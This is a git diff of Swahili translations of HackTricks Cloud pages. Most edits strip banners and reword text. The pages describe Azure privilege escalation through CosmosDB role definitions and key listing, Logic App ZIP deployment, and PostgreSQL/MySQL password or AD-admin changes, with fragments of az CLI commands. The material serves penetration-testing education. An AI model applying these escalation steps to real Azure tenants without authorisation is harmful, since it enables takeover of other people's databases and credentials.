* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}
## CosmosDB Privesc
Kwa maelezo zaidi kuhusu SQL Database angalia:
@@ -24,7 +11,7 @@ Kwa maelezo zaidi kuhusu SQL Database angalia:
### ("Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/write", "Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/read") & ("Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write", "Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/read")
Kwa ruhusa hizi unaweza kupandisha hadhi kwa kumuwezesha mtumiaji ruhusa za kutekeleza maswali na kuungana na database. Kwanza, jukumu la ufafanuzi linaundwa likitoa ruhusa na mipaka inayohitajika.
Kwa ruhusa hizi unaweza kupandisha hadhi kwa kumpa mtumiaji ruhusa za kutekeleza maswali na kuungana na database. Kwanza, jukumu la ufafanuzi linaundwa likitoa ruhusa na mipaka inayohitajika.
{% code overflow="wrap" %}
```bash
@@ -77,17 +64,4 @@ az cosmosdb keys list \
{% endcode %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}

32
src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md
View File

@@ -1,19 +1,6 @@
# Az - Logic Apps Privesc
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki hila za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}
## Logic Apps Privesc
Kwa maelezo zaidi kuhusu SQL Database angalia:
@@ -50,7 +37,7 @@ az rest \
--headers "Content-Type=application/json"
```
### ("Microsoft.Web/sites/read", "Microsoft.Web/sites/basicPublishingCredentialsPolicies/read", "Microsoft.Web/sites/write", "Microsoft.Web/sites/config/list/action") && ("Microsoft.Web/sites/start/action")
Kwa ruhusa hizi, unaweza kupeleka, Logic App workflows kwa kutumia ZIP file deployments. Ruhusa hizi zinawezesha vitendo kama kusoma maelezo ya programu, kufikia akreditivu za uchapishaji, kuandika mabadiliko, na kuorodhesha usanidi wa programu. Pamoja na ruhusa za kuanzisha, unaweza kuboresha na kupeleka Logic App mpya na maudhui unayotaka.
Kwa ruhusa hizi, unaweza kupeleka, Logic App workflows kwa kutumia ZIP file deployments. Ruhusa hizi zinawezesha vitendo kama kusoma maelezo ya programu, kufikia akreditivu za uchapishaji, kuandika mabadiliko, na kuorodhesha usanidi wa programu. Pamoja na ruhusa za kuanzisha unaweza kusasisha na kupeleka Logic App mpya na maudhui unayotaka.
{% code overflow="wrap" %}
```bash
@@ -61,17 +48,4 @@ az logicapp deployment source config-zip \
```
{% endcode %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}

31
src/pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.md
View File

@@ -1,19 +1,7 @@
# Az - MySQL Database Privesc
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
{{#include ../../../banners/hacktricks-training.md}}
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
## MySQL Database Privesc
Kwa maelezo zaidi kuhusu SQL Database angalia:
@@ -24,7 +12,7 @@ Kwa maelezo zaidi kuhusu SQL Database angalia:
### ""Microsoft.DBforMySQL/flexibleServers/read" && "Microsoft.DBforMySQL/flexibleServers/write"
Kwa ruhusa hii, unaweza kuunda, kusasisha, au kufuta mifano ya MySQL Flexible Server kwenye Azure. Hii inajumuisha kutoa seva mpya, kubadilisha mipangilio ya seva zilizopo, au kufuta seva.
Kwa ruhusa hii, unaweza kuunda, kusasisha, au kufuta MySQL Flexible Server instances kwenye Azure. Hii inajumuisha kutoa seva mpya, kubadilisha mipangilio ya seva zilizopo, au kufunga seva.
{% code overflow="wrap" %}
```bash
@@ -75,17 +63,4 @@ az mysql flexible-server ad-admin create \
```
{% endcode %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}

36
src/pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.md
View File

@@ -1,19 +1,6 @@
# Az - PostgreSQL Privesc
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}
## PostgreSQL Privesc
Kwa maelezo zaidi kuhusu SQL Database angalia:
@@ -24,7 +11,7 @@ Kwa maelezo zaidi kuhusu SQL Database angalia:
### "Microsoft.DBforPostgreSQL/flexibleServers/read" && "Microsoft.DBforPostgreSQL/flexibleServers/write"
Kwa ruhusa hii, unaweza kuunda, kusasisha, au kufuta mifano ya PostgreSQL Flexible Server kwenye Azure. Hii inajumuisha kutoa seva mpya, kubadilisha mipangilio ya seva zilizopo, au kufunga seva.
Kwa ruhusa hii, unaweza kuunda, kuboresha, au kufuta mifano ya PostgreSQL Flexible Server kwenye Azure. Hii inajumuisha kutoa seva mpya, kubadilisha mipangilio ya seva zilizopo, au kufunga seva.
{% code overflow="wrap" %}
```bash
@@ -41,7 +28,7 @@ az postgres flexible-server create \
```
{% endcode %}
Kwa mfano, ruhusa hizi zinaruhusu kubadilisha nenosiri la PostgreSQL, muhimu bila shaka katika kesi ambapo uthibitishaji wa PostgreSQL umewezeshwa.
Kwa mfano, ruhusa hizi zinaruhusu kubadilisha nenosiri la PostgreSQL, muhimu bila shaka ikiwa uthibitishaji wa PostgreSQL umewezeshwa.
{% code overflow="wrap" %}
```bash
@@ -64,7 +51,7 @@ az postgres flexible-server update --resource-group <resource_group_name> --serv
Kwa ruhusa hii, unaweza kuunda wasimamizi wa Azure Active Directory (AD) kwa seva ya PostgreSQL Flexible. Hii inaweza kutumiwa kwa kuweka mwenyewe au akaunti nyingine kama msimamizi wa AD, ikitoa udhibiti kamili wa usimamizi juu ya seva ya PostgreSQL. Kusasisha kiongozi aliye tayari hakusaidiwi bado hivyo ikiwa kuna mmoja aliyeundwa lazima uifute kwanza.
Ni muhimu kwamba seva ya flexible-server iwe na utambulisho wa usimamizi wa mtumiaji aliyepewa matumizi.
Ni muhimu kwamba seva ya flexible-server iwe na utambulisho wa usimamizi wa mtumiaji aliyepewa ili kuitumia.
{% code overflow="wrap" %}
```bash
@@ -77,17 +64,4 @@ az postgres flexible-server ad-admin create \
```
{% endcode %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}

41
src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md
View File

@@ -1,33 +1,20 @@
# Az - Cloud Shell
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}
## Azure Cloud Shell
**Azure Cloud Shell** ni terminal ya kuingiliana, iliyothibitishwa, inayopatikana kupitia kivinjari iliyoundwa kwa ajili ya kusimamia rasilimali za Azure, ikitoa uwezekano wa kufanya kazi na Bash au PowerShell. Inafanya kazi kwenye mwenyeji wa muda, kwa kila kikao ambao unakoma baada ya dakika 20 za kutokuwa na shughuli, huku ikihifadhi faili katika eneo la $HOME kwa kutumia sehemu ya faili ya 5-GB. Cloud Shell inaweza kupatikana kupitia maeneo mengi, ikiwa ni pamoja na lango la Azure, shell.azure.com, Azure CLI na nyaraka za PowerShell, programu ya simu ya Azure, na nyongeza ya Akaunti ya Azure katika Visual Studio Code.
**Azure Cloud Shell** ni terminal ya kuingiliana, iliyothibitishwa, inayopatikana kupitia kivinjari iliyoundwa kwa ajili ya kusimamia rasilimali za Azure, ikitoa uwezekano wa kufanya kazi na Bash au PowerShell. Inafanya kazi kwenye mwenyeji wa muda, kwa kila kikao ambao unakoma baada ya dakika 20 za kutokuwa na shughuli, huku ikihifadhi faili katika eneo la $HOME kwa kutumia sehemu ya faili ya 5-GB. Cloud Shell inaweza kufikiwa kupitia maeneo mengi, ikiwa ni pamoja na lango la Azure, shell.azure.com, Azure CLI na nyaraka za PowerShell, programu ya simu ya Azure, na nyongeza ya Akaunti ya Azure katika Visual Studio Code.
Hakuna ruhusa zilizotolewa kwa huduma hii, kwa hivyo hakuna mbinu za kupandisha hadhi. Pia hakuna aina yoyote ya uhesabuji.
### Key Features
**Environment**: Azure Cloud Shell inatoa mazingira salama kwa kukimbia kwenye Azure Linux, usambazaji wa Linux wa Microsoft ulioandaliwa kwa ajili ya miundombinu ya wingu. Kila pakiti iliyojumuishwa katika hifadhi ya Azure Linux inakusanywa ndani na Microsoft ili kulinda dhidi ya mashambulizi ya mnyororo wa usambazaji.
**Preinstalled Tools**: Cloud Shell inajumuisha seti kamili ya zana zilizowekwa awali kama vile Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, na wahariri wa maandiko kama vim, nano, na emacs. Zana hizi ziko tayari kutumika. Ili orodhesha pakiti na moduli zilizowekwa unaweza kutumia "Get-Module -ListAvailable", "tdnf list" na "pip3 list".
**$HOME persistence**: Unapozindua Azure Cloud Shell kwa mara ya kwanza, unaweza kuitumia na au bila akaunti ya kuhifadhi iliyounganishwa. Kuchagua kutounganisha kuhifadhi kunaunda kikao cha muda ambapo faili zinafuta wakati kikao kinamalizika. Ili kuhifadhi faili kati ya vikao, ungana na akaunti ya kuhifadhi, ambayo inajumuishwa kiotomatiki kama **$HOME\clouddrive**, huku saraka yako ya **$HOME** ikihifadhiwa kama faili ya **.img** katika Azure File Share. Hata hivyo, faili zilizo nje ya $HOME na hali za mashine hazihifadhiwi. Ili kuhifadhi kwa usalama siri kama funguo za SSH, tumia Azure Key Vault.
**Azure drive (Azure:)**: PowerShell katika Azure Cloud Shell inajumuisha diski ya Azure (Azure:), ambayo inaruhusu urahisi wa kuvinjari rasilimali za Azure kama vile Compute, Network, na Storage kwa kutumia amri kama za mfumo wa faili. Badilisha kwenda kwenye diski ya Azure kwa cd Azure: na rudi kwenye saraka yako ya nyumbani kwa cd ~. Unaweza bado kutumia cmdlets za Azure PowerShell kusimamia rasilimali kutoka diski yoyote.
**Custom Tool Installation**: Watumiaji wanaoandika Cloud Shell na akaunti ya kuhifadhi wanaweza kufunga zana za ziada ambazo hazihitaji ruhusa za mzizi. Kipengele hiki kinaruhusu uboreshaji zaidi wa mazingira ya Cloud Shell, ikiruhusu watumiaji kubinafsisha mipangilio yao kulingana na mahitaji yao maalum.
**Preinstalled Tools**: Cloud Shell inajumuisha seti kamili ya zana zilizowekwa awali kama Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, na wahariri wa maandiko kama vim, nano, na emacs. Zana hizi ziko tayari kutumika. Ili kuorodhesha pakiti na moduli zilizowekwa, unaweza kutumia "Get-Module -ListAvailable", "tdnf list" na "pip3 list".
**$HOME persistence**: Unapozindua Azure Cloud Shell kwa mara ya kwanza, unaweza kuitumia na au bila akaunti ya kuhifadhi iliyounganishwa. Kuchagua kutounganisha kuhifadhi kunaunda kikao cha muda ambapo faili zinafuta wakati kikao kinamalizika. Ili kuhifadhi faili kati ya vikao, ungana na akaunti ya kuhifadhi, ambayo inajunganishwa kiotomatiki kama **$HOME\clouddrive**, huku saraka yako ya **$HOME** ikihifadhiwa kama faili **.img** katika Azure File Share. Hata hivyo, faili zilizo nje ya $HOME na hali za mashine hazihifadhiwi. Ili kuhifadhi kwa usalama siri kama funguo za SSH, tumia Azure Key Vault.
**Azure drive (Azure:)**: PowerShell katika Azure Cloud Shell inajumuisha diski ya Azure (Azure:), ambayo inaruhusu urahisi wa kuvinjari rasilimali za Azure kama Compute, Network, na Storage kwa kutumia amri kama za mfumo wa faili. Badilisha kwenda kwenye diski ya Azure kwa cd Azure: na rudi kwenye saraka yako ya nyumbani kwa cd ~. Unaweza bado kutumia cmdlets za Azure PowerShell kusimamia rasilimali kutoka diski yoyote.
**Custom Tool Installation**: Watumiaji wanaoanzisha Cloud Shell na akaunti ya kuhifadhi wanaweza kufunga zana za ziada ambazo hazihitaji ruhusa za mzizi. Kipengele hiki kinaruhusu uboreshaji zaidi wa mazingira ya Cloud Shell, kikimwezesha watumiaji kubinafsisha mipangilio yao kulingana na mahitaji yao maalum.
## References
@@ -35,24 +22,10 @@ Hakuna ruhusa zilizotolewa kwa huduma hii, kwa hivyo hakuna mbinu za kupandisha
* [https://learn.microsoft.com/en-us/azure/cloud-shell/features](https://learn.microsoft.com/en-us/azure/cloud-shell/features)
* [https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window](https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window)
## Persistence
{% content-ref url="../az-privilege-escalation/az-cloud-shell-persistence.md" %}
[az-cloud-shell-persistence.md](../az-privilege-escalation/az-cloud-shell-persistence.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}

52
src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md
View File

@@ -1,30 +1,17 @@
# Az - CosmosDB
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}
## Azure CosmosDB
**Azure Cosmos DB** ni **hifadhi ya data ya NoSQL, ya uhusiano, na ya vector** inayosimamiwa kikamilifu inayo toa nyakati za majibu za milisekunde moja, upanuzi wa kiotomatiki, na upatikanaji unaoungwa mkono na SLA pamoja na usalama wa kiwango cha biashara. Inaruhusu maendeleo ya programu kwa haraka kupitia usambazaji wa data wa mikoa mingi, APIs za chanzo wazi, SDKs za lugha maarufu, na vipengele vya hifadhi ya data ya AI kama vile msaada wa vector uliojumuishwa na uunganisho usio na mshono wa Azure AI.
**Azure Cosmos DB** ni **hifadhidata ya NoSQL, ya uhusiano, na ya vector** inayosimamiwa kikamilifu, inatoa nyakati za majibu za milisekunde moja, upanuzi wa kiotomatiki, na upatikanaji unaoungwa mkono na SLA pamoja na usalama wa kiwango cha biashara. Inaruhusu maendeleo ya programu kwa haraka kupitia usambazaji wa data wa mikoa mingi, APIs za chanzo wazi, SDKs za lugha maarufu, na vipengele vya hifadhidata vya AI kama vile msaada wa vector uliojumuishwa na uunganisho usio na mshono wa Azure AI.
Azure Cosmos DB inatoa APIs nyingi za hifadhi ya data ili kuunda mfano wa data halisi kwa kutumia nyaraka, uhusiano, modeli za data za funguo-thamani, grafu, na familia za safu, ambapo hizi APIs ni NoSQL, MongoDB, PostgreSQL, Cassandra, Gremlin na Table.
Azure Cosmos DB inatoa APIs nyingi za hifadhidata ili kuunda mfano wa data halisi kwa kutumia nyaraka, uhusiano, funguo-thamani, grafu, na mifano ya data ya familia ya safu, ambapo APIs hizi ni NoSQL, MongoDB, PostgreSQL, Cassandra, Gremlin na Table.
Moja ya vipengele muhimu vya CosmosDB ni Akaunti ya Azure Cosmos. **Akaunti ya Azure Cosmos**, inafanya kazi kama kiingilio kwa hifadhi za data. Akaunti inamua mipangilio muhimu kama vile usambazaji wa kimataifa, viwango vya usawa, na API maalum itakayotumika, kama vile NoSQL. Kupitia akaunti, unaweza kuunda upya wa kimataifa ili kuhakikisha data inapatikana katika mikoa mingi kwa ufikiaji wa chini wa latency. Zaidi ya hayo, unaweza kuchagua kiwango cha usawa kinacholingana kati ya utendaji na usahihi wa data, ikiwa na chaguzi zinazotofautiana kutoka kwa Usawa Imara hadi Usawa wa Hatimaye.
Moja ya vipengele muhimu vya CosmosDB ni Akaunti ya Azure Cosmos. **Akaunti ya Azure Cosmos**, inafanya kazi kama kiingilio kwa hifadhidata. Akaunti inamua mipangilio muhimu kama vile usambazaji wa kimataifa, viwango vya usawa, na API maalum itakayotumika, kama vile NoSQL. Kupitia akaunti, unaweza kuunda upya wa kimataifa ili kuhakikisha data inapatikana katika mikoa mingi kwa ufikiaji wa chini wa ucheleweshaji. Zaidi ya hayo, unaweza kuchagua kiwango cha usawa kinacholingana kati ya utendaji na usahihi wa data, ikiwa na chaguzi zinazotofautiana kutoka kwa Usawa Imara hadi Usawa wa Hatimaye.
### NoSQL (sql)
API ya NoSQL ya Azure Cosmos DB ni API inayotegemea nyaraka inayotumia JSON kama muundo wake wa data. Inatoa sintaksia ya kuhoji inayofanana na SQL kwa kuhoji vitu vya JSON, na kuifanya iweze kutumika kwa kazi na data iliyopangwa na isiyo na mpangilio. Kituo cha huduma ni:
API ya Azure Cosmos DB NoSQL ni API inayotegemea nyaraka inayotumia JSON kama muundo wake wa data. Inatoa sintaksia ya kuhoji inayofanana na SQL kwa kuhoji vitu vya JSON, na kuifanya iweze kutumika kwa kufanya kazi na data iliyopangwa na semi-iliyopangwa. Kituo cha huduma ni:
{% code overflow="wrap" %}
```bash
@@ -33,7 +20,7 @@ https://<Account-Name>.documents.azure.com:443/
{% endcode %}
#### Databases
Katika akaunti, unaweza kuunda moja au zaidi ya hifadhidata, ambazo hutumikia kama makundi ya mantiki ya kontena. Hifadhidata inafanya kazi kama mpaka wa usimamizi wa rasilimali na ruhusa za mtumiaji. Hifadhidata zinaweza kushiriki kupitia uwezo wa kupangwa kati ya kontena zao au kugawa uwezo maalum kwa kontena binafsi.
Ndani ya akaunti, unaweza kuunda moja au zaidi ya hifadhidata, ambazo hutumikia kama makundi ya mantiki ya kontena. Hifadhidata inafanya kazi kama mpaka wa usimamizi wa rasilimali na ruhusa za mtumiaji. Hifadhidata zinaweza kushiriki kupitia uwezo wa kupangwa kati ya kontena zao au kugawa uwezo maalum kwa kontena binafsi.
#### Containers
Kitengo cha msingi cha uhifadhi wa data ni kontena, ambacho kinashikilia hati za JSON na kimepangwa kiotomatiki kwa ajili ya uchunguzi wa ufanisi. Kontena zinaweza kupanuliwa kwa urahisi na kusambazwa kati ya sehemu, ambazo zinatolewa na ufunguo wa sehemu ulioelezwa na mtumiaji. Ufunguzi wa sehemu ni muhimu kwa kuhakikisha utendaji bora na usambazaji sawa wa data. Kwa mfano, kontena inaweza kuhifadhi data za wateja, huku "customerId" ikiwa kama ufunguo wa sehemu.
@@ -173,7 +160,7 @@ print(item)
```
{% endcode %}
Njia nyingine ya kuanzisha muunganisho ni kutumia **DefaultAzureCredential()**. Inahitajika tu kuingia (az login) na akaunti ambayo ina ruhusa na kuitekeleza. Kwa kesi hii, lazima ifanyike ugawaji wa jukumu, ikitoa ruhusa zinazohitajika (ona kwa mor)
Njia nyingine ya kuanzisha muunganisho ni kutumia **DefaultAzureCredential()**. Inahitaji tu kuingia (az login) na akaunti ambayo ina ruhusa na kuitekeleza. Kwa kesi hii, lazima ifanyike ugawaji wa jukumu, ikitoa ruhusa zinazohitajika (ona kwa mor)
{% code overflow="wrap" %}
```python
